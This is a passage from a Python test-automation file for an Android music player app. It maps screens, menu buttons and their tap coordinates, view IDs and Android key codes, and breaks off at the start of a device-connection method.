'1':{'x':642,'y':100,},\n },\n 'bottom-3':{\n '0':{'x':230,'y':1184,},\n '1':{'x':370,'y':1184,},\n '2':{'x':490,'y':1184,},\n },\n 'bottom-4':{\n '0':{'x':195,'y':1184,},\n '1':{'x':316,'y':1184,},\n '2':{'x':420,'y':1184,},\n '3':{'x':550,'y':1184,},\n },\n },\n }\n\n confirm_cancel = {\n 'hm2':{\n 'confirm':{'x':514,'y':1189,},\n 'cancel':{'x':230,'y':1189,},\n },\n }\n\n button_pos = {\n 'hm2':\n {'online_more_albums_random': {'random_albums': {'x': 602, 'y': 905}},\n 'online_album_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'download_all': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 895}},\n 'playlist_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 785}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'addto': {'x': 
360, 'y': 895}},\n 'folders_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'fm': {'random_fm': {'x': 360, 'y': 416}},\n 'online': {'toggle': {'x': 665, 'y': 95}, 'hot_artists': {'x': 125, 'y': 1217}, 'new_albums': {'x': 125, 'y': 831}, 'input': {'x': 360, 'y': 275}, 'more_albums': {'x': 657, 'y': 377}, 'home': {'x': 42, 'y': 95}, 'more_artists': {'x': 657, 'y': 1069}},\n 'album_detail': {'randomplayall': {'x': 360, 'y': 202}, 'randomsong': {'x': 360, 'y': 326}},\n 'folder_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 785}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'addto': {'x': 360, 'y': 895}},\n 'singer_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'download_all_cover': {'x': 360, 'y': 895}, 'exit': {'x': 360, 'y': 1225}},\n 'online_singer_songs_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'download_all': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 895}},\n 'folder_detail': {'randomplayall': {'x': 360, 'y': 202}, 'randomsong': {'x': 360, 'y': 326}},\n 'singers_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'download_avatar': {'x': 360, 'y': 895}, 'exit': {'x': 360, 'y': 1225}},\n 'nowplaying': {'toggle': {'x': 669, 'y': 74}, 'pause': {'x': 360, 'y': 1094}, 'prev': {'x': 189, 'y': 1094}, 'equalizer': {'x': 59, 'y': 1094}, 'home': {'x': 58, 'y': 93}, 'next': {'x': 532, 'y': 1094}, 'repeat': {'x': 661, 'y': 1094}},\n 'singers': {'toggle': {'x': 665, 'y': 95}, 'randomsinger': {'x': 360, 'y': 574}, 'home': {'x': 42, 'y': 95}},\n 'playlists_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'billboard_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'playlists': {'mostplayed': {'x': 360, 'y': 574}, 'toggle': {'x': 665, 'y': 95}, 'recentlyplayed': {'x': 360, 'y': 326}, 'newlist': {'x': 360, 'y': 1203}, 'favorite': {'x': 360, 'y': 202}, 'home': {'x': 42, 'y': 95}, 'recentlyadded': {'x': 360, 'y': 450}},\n 'musichome_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'refresh': {'x': 360, 'y': 785}, 'exit': {'x': 360, 'y': 1225}, 'search': {'x': 360, 'y': 895}},\n 'musichome': {'online': {'x': 600, 'y': 1159}, 'playlists': {'x': 360, 'y': 1159}, 'singers': {'x': 360, 'y': 919}, 'folders': {'x': 120, 'y': 1159}, 'albums': {'x': 600, 'y': 919}, 'songs': {'x': 120, 'y': 919}, 'main_play_button': {'x': 631, 'y': 137}},\n 'online_album_detail': {'toggle': {'x': 670, 'y': 124}, 'play_all': {'x': 360, 'y': 698}, 'home': {'x': 58, 'y': 143}, 'download_single': {'x': 648, 'y': 822}},\n 'album_detail_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 675}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'change_album_info': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 895}},\n 'albums_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'download_cover': {'x': 360, 'y': 895}},\n 'folders': {'toggle': {'x': 665, 'y': 95}, 'randomfolder': {'x': 360, 'y': 822}, 'home': {'x': 42, 'y': 95}},\n 'albums': {'toggle': {'x': 665, 'y': 95}, 'home': {'x': 42, 'y': 95}, 'randomalbum': {'x': 360, 'y': 450}},\n 'songs': {'toggle': {'x': 665, 'y': 95}, 'home': {'x': 42, 'y': 95}, 'randomplayall': {'x': 360, 'y': 822}, 
'randomsong': {'x': 360, 'y': 822}},\n 'songs_menu': {'settings': {'x': 360, 'y': 1115}, 'id3': {'x': 360, 'y': 785}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}, 'addto': {'x': 360, 'y': 895}},\n 'nowplaying_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'delete': {'x': 360, 'y': 565}, 'sendto': {'x': 360, 'y': 895}, 'exit': {'x': 360, 'y': 1225}, 'modify': {'x': 360, 'y': 785}, 'addto': {'x': 360, 'y': 675}},\n 'fm_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'nowplaying_list': {}, 'online_singer_songs': {'toggle': {'x': 670, 'y': 124}, 'play_all': {'x': 360, 'y': 698}, 'home': {'x': 58, 'y': 143}, 'download_single': {'x': 648, 'y': 822}},\n 'singer_detail': {'all_songs': {'x': 360, 'y': 202}, 'random_album': {'x': 360, 'y': 326}},\n 'online_singer_albums_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'online_more_singers_random': {'random_singers': {'x': 367, 'y': 278}},\n 'nowplaying_lyric': {}, 'online_singer_albums': {'toggle': {'x': 670, 'y': 124}, 'album': {'x': 602, 'y': 293}, 'home': {'x': 58, 'y': 143}},\n 'online_menu': {'settings': {'x': 360, 'y': 1115}, 'sleepmode': {'x': 360, 'y': 1005}, 'exit': {'x': 360, 'y': 1225}},\n 'billboard': {'random_billboard': {'x': 360, 'y': 824}},\n 'playlist_detail': {'randomplayall': {'x': 360, 'y': 202}, 'randomsong': {'x': 360, 'y': 326}}\n },\n }\n\n phone_list =[\n 'hm2',\n ]\n\n page_list =[\n #old\n 'musichome',\t\t\t#0\n\t\t'musichome_menu',\t\t#1\n 'nowplaying',\t\t\t#2\n\t\t'nowplaying_menu',\t\t#3\n 'songs',\t\t\t\t#4\n\t\t'songs_menu',\t\t\t#5\n 'singers',\t\t\t\t#6\n\t\t'singers_menu',\t\t\t#7\n 'albums',\t\t\t\t#8\n\t\t'albums_menu',\t\t\t#9\n 'folders',\t\t\t\t#10\n\t\t'folders_menu',\t\t\t#11\n 'playlists',\t\t\t#12\n\t\t'playlists_menu',\t\t#13\n 'online',\t\t\t\t#14\n\t\t'online_menu',\t\t\t#15\n #new\n 'singer_detail',\t\t#16\n\t\t'singer_detail_menu',\t#17\n 'album_detail',\t\t\t#18\n\t\t'album_detail_menu',\t#19\n 'folder_detail',\t\t#20\n\t\t'folder_detail_menu',\t#21\n 'playlist_detail',\t\t#22\n\t\t'playlist_detail_menu',\t#23\n 'billboard',\t\t\t#24\n\t\t'billboard_menu',\t\t#25\n 'fm',\t\t\t\t\t#26\n\t\t'fm_menu',\t\t\t\t#27\n #new\n 'online_album_detail',\t\t\t\t#28\n 'online_album_detail_menu',\t\t\t\t#29\n 'online_singer_songs',\t\t\t\t#30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n 'online_singer_songs_menu',\t\t\t\t#31\n 'online_singer_albums',\t\t\t\t#32 children[1].children[1].children[0] first\n 'online_singer_albums_menu',\t\t\t\t#33\n #new\n 'online_more_albums_random',#34\n 'online_more_singers_random',#35\n ]\n\n page_dict={\n 'musichome':'musichome',\n 'musichome_menu':'musichome_menu',\n 'nowplaying':'nowplaying',\n 'nowplaying_menu':'nowplaying_menu',\n 'songs':'songs',\n 'songs_menu':'songs_menu',\n 'singers':'singers',\n 'singers_menu':'singers_menu',\n 'albums':'albums',\n 'albums_menu':'albums_menu',\n 'folders':'folders',\n 'folders_menu':'folders_menu',\n 'playlists':'playlists',\n 'playlists_menu':'playlists_menu',\n 'online':'online',\n 'online_menu':'online_menu',\n 'singer_detail':'singer_detail',\n 'singer_detail_menu':'singer_detail_menu',\n 'album_detail':'album_detail',\n 'album_detail_menu':'album_detail_menu',\n 'folder_detail':'folder_detail',\n 'folder_detail_menu':'folder_detail_menu',\n 'playlist_detail':'playlist_detail',\n 
'playlist_detail_menu':'playlist_detail_menu',\n 'billboard':'billboard',\n 'billboard_menu':'billboard_menu',\n 'fm':'fm',\n 'fm_menu':'fm_menu',\n 'online_album_detail':'online_album_detail',\n 'online_album_detail_menu':'online_album_detail_menu',\n 'online_singer_songs':'online_singer_songs',\n 'online_singer_songs_menu':'online_singer_songs_menu',\n 'online_singer_albums':'online_singer_albums',\n 'online_singer_albums_menu':'online_singer_albums_menu',\n #new\n 'online_more_albums_random':'online_more_albums_random',\n 'online_more_singers_random':'online_more_singers_random',\n }\n\n\n id_list = {\n 'hm2':{\n #old\n 'musichome':'id/main_frame',\n 'musichome_menu':'id/expanded_menu',\n 'nowplaying':'id/miro_content_container',\n 'nowplaying_menu':'id/expanded_menu',\n 'songs':'id/list',\n 'songs_menu':'id/expanded_menu',\n 'singers':'id/list',\n 'singers_menu':'id/expanded_menu',\n 'albums':'id/list',\n 'albums_menu':'id/expanded_menu',\n 'folders':'id/list',\n 'folders_menu':'id/expanded_menu',\n 'playlists':'id/list',\n 'playlists_menu':'id/expanded_menu',\n 'online':'id/content_wrap',\n 'online_menu':'id/expanded_menu',\n #new\n 'singer_detail':'id/list',# 0 rnd\n 'singer_detail_menu':'id/expanded_menu',\n 'album_detail':'id/list',#0 rnd\n 'album_detail_menu':'id/expanded_menu',\n 'folder_detail':'id/list',#0 rnd\n 'folder_detail_menu':'id/expanded_menu',\n 'playlist_detail':'id/list',#0 rnd\n 'playlist_detail_menu':'id/expanded_menu',\n 'billboard':'id/view_pager',#children[1].children[1].children[rnd]\n 'billboard_menu':'id/expanded_menu',\n 'fm':'id/view_pager',#children[2].children[1].children[rnd]\n 'fm_menu':'id/expanded_menu',\n #new\n 'online_album_detail':'id/list',\t\t\t\t#28\n 'online_album_detail_menu':'id/expanded_menu',\t\t\t\t#29\n 'online_singer_songs':'id/view_pager',\t\t\t\t#30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n 'online_singer_songs_menu':'id/expanded_menu',\t\t\t\t#31\n 'online_singer_albums':'id/view_pager',\t\t\t\t#32 children[1].children[1].children[0] first\n 'online_singer_albums_menu':'id/expanded_menu',\t\t\t\t#33\n #new\n 'online_more_albums_random':'id/list',#34\n 'online_more_singers_random':'id/list',#35\n },\n }\n button_list = {\n 'hm2':{\n #old\n #music home page button name\n 'musichome':['main_play_button','songs','singers','albums','folders','playlists','online'],\n #music home page menu list name\n 'musichome_menu':['refresh','search','sleepmode','settings','exit'],\n #music nowplaying page button name\n 'nowplaying':['home','equalizer','prev','pause','next','repeat','toggle'],\n #music nowplaying page menu name\n 'nowplaying_menu':['delete','addto','modify','sendto','sleepmode','settings','exit'],\n #song list\n 'songs':['home','toggle','randomplayall','randomsong',],\n #song list menu\n 'songs_menu':['id3','addto','sleepmode','settings','exit',],\n #singers list\n 'singers':['home','toggle','randomsinger',],\n #singers list menu\n 'singers_menu':['download_avatar','sleepmode','settings','exit',],\n #albums list\n 'albums':['home','toggle','randomalbum',],\n #albums list menu\n 'albums_menu':['download_cover','sleepmode','settings','exit',],\n #folders list\n 'folders':['home','toggle','randomfolder',],\n #folders list menu\n 'folders_menu':['sleepmode','settings','exit',],\n #playlists\n 'playlists':['home','toggle','favorite','recentlyplayed','recentlyadded','mostplayed','newlist',],#v5_icon_menu_bar_primary_item\n #playlists menu\n 
'playlists_menu':['sleepmode','settings','exit',],\n #online page\n 'online':['home','toggle','input','more_albums','new_albums','more_artists','hot_artists',],\n #online page menu\n 'online_menu':['sleepmode','settings','exit',],\n #new\n #singer detail page\n 'singer_detail':['all_songs','random_album'],\n #singer detail menu page\n 'singer_detail_menu':['download_all_cover','sleepmode','settings','exit',],\n #album detail page\n 'album_detail':['randomplayall','randomsong'],\n #album detail menu page\n 'album_detail_menu':['id3','change_album_info','addto','sleepmode','settings','exit',],\n #folder detail page\n 'folder_detail':['randomplayall','randomsong'],\n #folder detail menu page\n 'folder_detail_menu':['id3','addto','sleepmode','settings','exit',],\n #playlist detail page\n 'playlist_detail':['randomplayall','randomsong',],\n #playlist detail menu page\n 'playlist_detail_menu':['id3','addto','sleepmode','settings','exit',],\n #billboard page\n 'billboard':['random_billboard'],\n #billboard menu page\n 'billboard_menu':['sleepmode','settings','exit',],\n #fm page\n 'fm':['random_fm'],\n #fm menu page\n 'fm_menu':['sleepmode','settings','exit',],\n #new\n 'online_album_detail':['home','toggle','play_all','download_single',],\t\t\t\t#28\n 'online_album_detail_menu':['download_all','addto','sleepmode','settings','exit',],\t\t\t\t#29\n 'online_singer_songs':['home','toggle','play_all','download_single',],\t\t\t\t#30 children[0].children[1].children[0] play_all children[0].children[1].children[1].children[1]\n 'online_singer_songs_menu':['download_all','addto','sleepmode','settings','exit',],\t\t\t\t#31\n 'online_singer_albums':['home','toggle','album',],\t\t\t#32 children[1].children[1].children[0] first\n 'online_singer_albums_menu':['sleepmode','settings','exit',],\t\t\t\t#33\n #new\n 'online_more_albums_random':['random_albums'],\n 'online_more_singers_random':['random_singers'],\n },\n }\n\n Key_Code = {\n 'KEYCODE_0':'KEYCODE_0',\n 'KEYCODE_1':'KEYCODE_1',\n 'KEYCODE_2':'KEYCODE_2',\n 'KEYCODE_3':'KEYCODE_3',\n 'KEYCODE_3D_MODE':'KEYCODE_3D_MODE',\n 'KEYCODE_4':'KEYCODE_4',\n 'KEYCODE_5':'KEYCODE_5',\n 'KEYCODE_6':'KEYCODE_6',\n 'KEYCODE_7':'KEYCODE_7',\n 'KEYCODE_8':'KEYCODE_8',\n 'KEYCODE_9':'KEYCODE_9',\n 'KEYCODE_A':'KEYCODE_A',\n 'KEYCODE_ALT_LEFT':'KEYCODE_ALT_LEFT',\n 'KEYCODE_ALT_RIGHT':'KEYCODE_ALT_RIGHT',\n 'KEYCODE_APOSTROPHE':'KEYCODE_APOSTROPHE',\n 'KEYCODE_APP_SWITCH':'KEYCODE_APP_SWITCH',\n 'KEYCODE_ASSIST':'KEYCODE_ASSIST',\n 'KEYCODE_AT':'KEYCODE_AT',\n 'KEYCODE_AVR_INPUT':'KEYCODE_AVR_INPUT',\n 'KEYCODE_AVR_POWER':'KEYCODE_AVR_POWER',\n 'KEYCODE_B':'KEYCODE_B',\n 'KEYCODE_BACK':'KEYCODE_BACK',\n 'KEYCODE_BACKSLASH':'KEYCODE_BACKSLASH',\n 'KEYCODE_BOOKMARK':'KEYCODE_BOOKMARK',\n 'KEYCODE_BREAK':'KEYCODE_BREAK',\n 'KEYCODE_BUTTON_1':'KEYCODE_BUTTON_1',\n 'KEYCODE_BUTTON_10':'KEYCODE_BUTTON_10',\n 'KEYCODE_BUTTON_11':'KEYCODE_BUTTON_11',\n 'KEYCODE_BUTTON_12':'KEYCODE_BUTTON_12',\n 'KEYCODE_BUTTON_13':'KEYCODE_BUTTON_13',\n 'KEYCODE_BUTTON_14':'KEYCODE_BUTTON_14',\n 'KEYCODE_BUTTON_15':'KEYCODE_BUTTON_15',\n 'KEYCODE_BUTTON_16':'KEYCODE_BUTTON_16',\n 'KEYCODE_BUTTON_2':'KEYCODE_BUTTON_2',\n 'KEYCODE_BUTTON_3':'KEYCODE_BUTTON_3',\n 'KEYCODE_BUTTON_4':'KEYCODE_BUTTON_4',\n 'KEYCODE_BUTTON_5':'KEYCODE_BUTTON_5',\n 'KEYCODE_BUTTON_6':'KEYCODE_BUTTON_6',\n 'KEYCODE_BUTTON_7':'KEYCODE_BUTTON_7',\n 'KEYCODE_BUTTON_8':'KEYCODE_BUTTON_8',\n 'KEYCODE_BUTTON_9':'KEYCODE_BUTTON_9',\n 'KEYCODE_BUTTON_A':'KEYCODE_BUTTON_A',\n 'KEYCODE_BUTTON_B':'KEYCODE_BUTTON_B',\n 
'KEYCODE_BUTTON_C':'KEYCODE_BUTTON_C',\n 'KEYCODE_BUTTON_L1':'KEYCODE_BUTTON_L1',\n 'KEYCODE_BUTTON_L2':'KEYCODE_BUTTON_L2',\n 'KEYCODE_BUTTON_MODE':'KEYCODE_BUTTON_MODE',\n 'KEYCODE_BUTTON_R1':'KEYCODE_BUTTON_R1',\n 'KEYCODE_BUTTON_R2':'KEYCODE_BUTTON_R2',\n 'KEYCODE_BUTTON_SELECT':'KEYCODE_BUTTON_SELECT',\n 'KEYCODE_BUTTON_START':'KEYCODE_BUTTON_START',\n 'KEYCODE_BUTTON_THUMBL':'KEYCODE_BUTTON_THUMBL',\n 'KEYCODE_BUTTON_THUMBR':'KEYCODE_BUTTON_THUMBR',\n 'KEYCODE_BUTTON_X':'KEYCODE_BUTTON_X',\n 'KEYCODE_BUTTON_Y':'KEYCODE_BUTTON_Y',\n 'KEYCODE_BUTTON_Z':'KEYCODE_BUTTON_Z',\n 'KEYCODE_C':'KEYCODE_C',\n 'KEYCODE_CALCULATOR':'KEYCODE_CALCULATOR',\n 'KEYCODE_CALENDAR':'KEYCODE_CALENDAR',\n 'KEYCODE_CALL':'KEYCODE_CALL',\n 'KEYCODE_CAMERA':'KEYCODE_CAMERA',\n 'KEYCODE_CAPS_LOCK':'KEYCODE_CAPS_LOCK',\n 'KEYCODE_CAPTIONS':'KEYCODE_CAPTIONS',\n 'KEYCODE_CHANNEL_DOWN':'KEYCODE_CHANNEL_DOWN',\n 'KEYCODE_CHANNEL_UP':'KEYCODE_CHANNEL_UP',\n 'KEYCODE_CLEAR':'KEYCODE_CLEAR',\n 'KEYCODE_COMMA':'KEYCODE_COMMA',\n 'KEYCODE_CONTACTS':'KEYCODE_CONTACTS',\n 'KEYCODE_CTRL_LEFT':'KEYCODE_CTRL_LEFT',\n 'KEYCODE_CTRL_RIGHT':'KEYCODE_CTRL_RIGHT',\n 'KEYCODE_D':'KEYCODE_D',\n 'KEYCODE_DEL':'KEYCODE_DEL',\n 'KEYCODE_DPAD_CENTER':'KEYCODE_DPAD_CENTER',\n 'KEYCODE_DPAD_DOWN':'KEYCODE_DPAD_DOWN',\n 'KEYCODE_DPAD_LEFT':'KEYCODE_DPAD_LEFT',\n 'KEYCODE_DPAD_RIGHT':'KEYCODE_DPAD_RIGHT',\n 'KEYCODE_DPAD_UP':'KEYCODE_DPAD_UP',\n 'KEYCODE_DVR':'KEYCODE_DVR',\n 'KEYCODE_E':'KEYCODE_E',\n 'KEYCODE_EISU':'KEYCODE_EISU',\n 'KEYCODE_ENDCALL':'KEYCODE_ENDCALL',\n 'KEYCODE_ENTER':'KEYCODE_ENTER',\n 'KEYCODE_ENVELOPE':'KEYCODE_ENVELOPE',\n 'KEYCODE_EQUALS':'KEYCODE_EQUALS',\n 'KEYCODE_ESCAPE':'KEYCODE_ESCAPE',\n 'KEYCODE_EXPLORER':'KEYCODE_EXPLORER',\n 'KEYCODE_F':'KEYCODE_F',\n 'KEYCODE_F1':'KEYCODE_F1',\n 'KEYCODE_F10':'KEYCODE_F10',\n 'KEYCODE_F11':'KEYCODE_F11',\n 'KEYCODE_F12':'KEYCODE_F12',\n 'KEYCODE_F2':'KEYCODE_F2',\n 'KEYCODE_F3':'KEYCODE_F3',\n 'KEYCODE_F4':'KEYCODE_F4',\n 'KEYCODE_F5':'KEYCODE_F5',\n 'KEYCODE_F6':'KEYCODE_F6',\n 'KEYCODE_F7':'KEYCODE_F7',\n 'KEYCODE_F8':'KEYCODE_F8',\n 'KEYCODE_F9':'KEYCODE_F9',\n 'KEYCODE_FOCUS':'KEYCODE_FOCUS',\n 'KEYCODE_FORWARD':'KEYCODE_FORWARD',\n 'KEYCODE_FORWARD_DEL':'KEYCODE_FORWARD_DEL',\n 'KEYCODE_FUNCTION':'KEYCODE_FUNCTION',\n 'KEYCODE_G':'KEYCODE_G',\n 'KEYCODE_GRAVE':'KEYCODE_GRAVE',\n 'KEYCODE_GUIDE':'KEYCODE_GUIDE',\n 'KEYCODE_H':'KEYCODE_H',\n 'KEYCODE_HEADSETHOOK':'KEYCODE_HEADSETHOOK',\n 'KEYCODE_HENKAN':'KEYCODE_HENKAN',\n 'KEYCODE_HOME':'KEYCODE_HOME',\n 'KEYCODE_I':'KEYCODE_I',\n 'KEYCODE_INFO':'KEYCODE_INFO',\n 'KEYCODE_INSERT':'KEYCODE_INSERT',\n 'KEYCODE_J':'KEYCODE_J',\n 'KEYCODE_K':'KEYCODE_K',\n 'KEYCODE_KANA':'KEYCODE_KANA',\n 'KEYCODE_KATAKANA_HIRAGANA':'KEYCODE_KATAKANA_HIRAGANA',\n 'KEYCODE_L':'KEYCODE_L',\n 'KEYCODE_LANGUAGE_SWITCH':'KEYCODE_LANGUAGE_SWITCH',\n 'KEYCODE_LEFT_BRACKET':'KEYCODE_LEFT_BRACKET',\n 'KEYCODE_M':'KEYCODE_M',\n 'KEYCODE_MANNER_MODE':'KEYCODE_MANNER_MODE',\n 'KEYCODE_MEDIA_CLOSE':'KEYCODE_MEDIA_CLOSE',\n 'KEYCODE_MEDIA_EJECT':'KEYCODE_MEDIA_EJECT',\n 'KEYCODE_MEDIA_FAST_FORWARD':'KEYCODE_MEDIA_FAST_FORWARD',\n 'KEYCODE_MEDIA_NEXT':'KEYCODE_MEDIA_NEXT',\n 'KEYCODE_MEDIA_PAUSE':'KEYCODE_MEDIA_PAUSE',\n 'KEYCODE_MEDIA_PLAY':'KEYCODE_MEDIA_PLAY',\n 'KEYCODE_MEDIA_PLAY_PAUSE':'KEYCODE_MEDIA_PLAY_PAUSE',\n 'KEYCODE_MEDIA_PREVIOUS':'KEYCODE_MEDIA_PREVIOUS',\n 'KEYCODE_MEDIA_RECORD':'KEYCODE_MEDIA_RECORD',\n 'KEYCODE_MEDIA_REWIND':'KEYCODE_MEDIA_REWIND',\n 'KEYCODE_MEDIA_STOP':'KEYCODE_MEDIA_STOP',\n 'KEYCODE_MENU':'KEYCODE_MENU',\n 
'KEYCODE_META_LEFT':'KEYCODE_META_LEFT',\n 'KEYCODE_META_RIGHT':'KEYCODE_META_RIGHT',\n 'KEYCODE_MINUS':'KEYCODE_MINUS',\n 'KEYCODE_MOVE_END':'KEYCODE_MOVE_END',\n 'KEYCODE_MOVE_HOME':'KEYCODE_MOVE_HOME',\n 'KEYCODE_MUHENKAN':'KEYCODE_MUHENKAN',\n 'KEYCODE_MUSIC':'KEYCODE_MUSIC',\n 'KEYCODE_MUTE':'KEYCODE_MUTE',\n 'KEYCODE_N':'KEYCODE_N',\n 'KEYCODE_NOTIFICATION':'KEYCODE_NOTIFICATION',\n 'KEYCODE_NUM':'KEYCODE_NUM',\n 'KEYCODE_NUMPAD_0':'KEYCODE_NUMPAD_0',\n 'KEYCODE_NUMPAD_1':'KEYCODE_NUMPAD_1',\n 'KEYCODE_NUMPAD_2':'KEYCODE_NUMPAD_2',\n 'KEYCODE_NUMPAD_3':'KEYCODE_NUMPAD_3',\n 'KEYCODE_NUMPAD_4':'KEYCODE_NUMPAD_4',\n 'KEYCODE_NUMPAD_5':'KEYCODE_NUMPAD_5',\n 'KEYCODE_NUMPAD_6':'KEYCODE_NUMPAD_6',\n 'KEYCODE_NUMPAD_7':'KEYCODE_NUMPAD_7',\n 'KEYCODE_NUMPAD_8':'KEYCODE_NUMPAD_8',\n 'KEYCODE_NUMPAD_9':'KEYCODE_NUMPAD_9',\n 'KEYCODE_NUMPAD_ADD':'KEYCODE_NUMPAD_ADD',\n 'KEYCODE_NUMPAD_COMMA':'KEYCODE_NUMPAD_COMMA',\n 'KEYCODE_NUMPAD_DIVIDE':'KEYCODE_NUMPAD_DIVIDE',\n 'KEYCODE_NUMPAD_DOT':'KEYCODE_NUMPAD_DOT',\n 'KEYCODE_NUMPAD_ENTER':'KEYCODE_NUMPAD_ENTER',\n 'KEYCODE_NUMPAD_EQUALS':'KEYCODE_NUMPAD_EQUALS',\n 'KEYCODE_NUMPAD_LEFT_PAREN':'KEYCODE_NUMPAD_LEFT_PAREN',\n 'KEYCODE_NUMPAD_MULTIPLY':'KEYCODE_NUMPAD_MULTIPLY',\n 'KEYCODE_NUMPAD_RIGHT_PAREN':'KEYCODE_NUMPAD_RIGHT_PAREN',\n 'KEYCODE_NUMPAD_SUBTRACT':'KEYCODE_NUMPAD_SUBTRACT',\n 'KEYCODE_NUM_LOCK':'KEYCODE_NUM_LOCK',\n 'KEYCODE_O':'KEYCODE_O',\n 'KEYCODE_P':'KEYCODE_P',\n 'KEYCODE_PAGE_DOWN':'KEYCODE_PAGE_DOWN',\n 'KEYCODE_PAGE_UP':'KEYCODE_PAGE_UP',\n 'KEYCODE_PERIOD':'KEYCODE_PERIOD',\n 'KEYCODE_PICTSYMBOLS':'KEYCODE_PICTSYMBOLS',\n 'KEYCODE_PLUS':'KEYCODE_PLUS',\n 'KEYCODE_POUND':'KEYCODE_POUND',\n 'KEYCODE_POWER':'KEYCODE_POWER',\n 'KEYCODE_PROG_BLUE':'KEYCODE_PROG_BLUE',\n 'KEYCODE_PROG_GREEN':'KEYCODE_PROG_GREEN',\n 'KEYCODE_PROG_RED':'KEYCODE_PROG_RED',\n 'KEYCODE_PROG_YELLOW':'KEYCODE_PROG_YELLOW',\n 'KEYCODE_Q':'KEYCODE_Q',\n 'KEYCODE_R':'KEYCODE_R',\n 'KEYCODE_RIGHT_BRACKET':'KEYCODE_RIGHT_BRACKET',\n 'KEYCODE_RO':'KEYCODE_RO',\n 'KEYCODE_S':'KEYCODE_S',\n 'KEYCODE_SCROLL_LOCK':'KEYCODE_SCROLL_LOCK',\n 'KEYCODE_SEARCH':'KEYCODE_SEARCH',\n 'KEYCODE_SEMICOLON':'KEYCODE_SEMICOLON',\n 'KEYCODE_SETTINGS':'KEYCODE_SETTINGS',\n 'KEYCODE_SHIFT_LEFT':'KEYCODE_SHIFT_LEFT',\n 'KEYCODE_SHIFT_RIGHT':'KEYCODE_SHIFT_RIGHT',\n 'KEYCODE_SLASH':'KEYCODE_SLASH',\n 'KEYCODE_SOFT_LEFT':'KEYCODE_SOFT_LEFT',\n 'KEYCODE_SOFT_RIGHT':'KEYCODE_SOFT_RIGHT',\n 'KEYCODE_SPACE':'KEYCODE_SPACE',\n 'KEYCODE_STAR':'KEYCODE_STAR',\n 'KEYCODE_STB_INPUT':'KEYCODE_STB_INPUT',\n 'KEYCODE_STB_POWER':'KEYCODE_STB_POWER',\n 'KEYCODE_SWITCH_CHARSET':'KEYCODE_SWITCH_CHARSET',\n 'KEYCODE_SYM':'KEYCODE_SYM',\n 'KEYCODE_SYSRQ':'KEYCODE_SYSRQ',\n 'KEYCODE_T':'KEYCODE_T',\n 'KEYCODE_TAB':'KEYCODE_TAB',\n 'KEYCODE_TV':'KEYCODE_TV',\n 'KEYCODE_TV_INPUT':'KEYCODE_TV_INPUT',\n 'KEYCODE_TV_POWER':'KEYCODE_TV_POWER',\n 'KEYCODE_U':'KEYCODE_U',\n 'KEYCODE_UNKNOWN':'KEYCODE_UNKNOWN',\n 'KEYCODE_V':'KEYCODE_V',\n 'KEYCODE_VOLUME_DOWN':'KEYCODE_VOLUME_DOWN',\n 'KEYCODE_VOLUME_MUTE':'KEYCODE_VOLUME_MUTE',\n 'KEYCODE_VOLUME_UP':'KEYCODE_VOLUME_UP',\n 'KEYCODE_W':'KEYCODE_W',\n 'KEYCODE_WINDOW':'KEYCODE_WINDOW',\n 'KEYCODE_X':'KEYCODE_X',\n 'KEYCODE_Y':'KEYCODE_Y',\n 'KEYCODE_YEN':'KEYCODE_YEN',\n 'KEYCODE_Z':'KEYCODE_Z',\n 'KEYCODE_ZENKAKU_HANKAKU':'KEYCODE_ZENKAKU_HANKAKU',\n 'KEYCODE_ZOOM_IN':'KEYCODE_ZOOM_IN',\n 'KEYCODE_ZOOM_OUT':'KEYCODE_ZOOM_OUT',\n }\n\n def __init__(self):\n self.getDeviceList()\n\n def connectToDevice(self,deviceID,timeout = 10):\n \"\"\"\n connect to device\n 
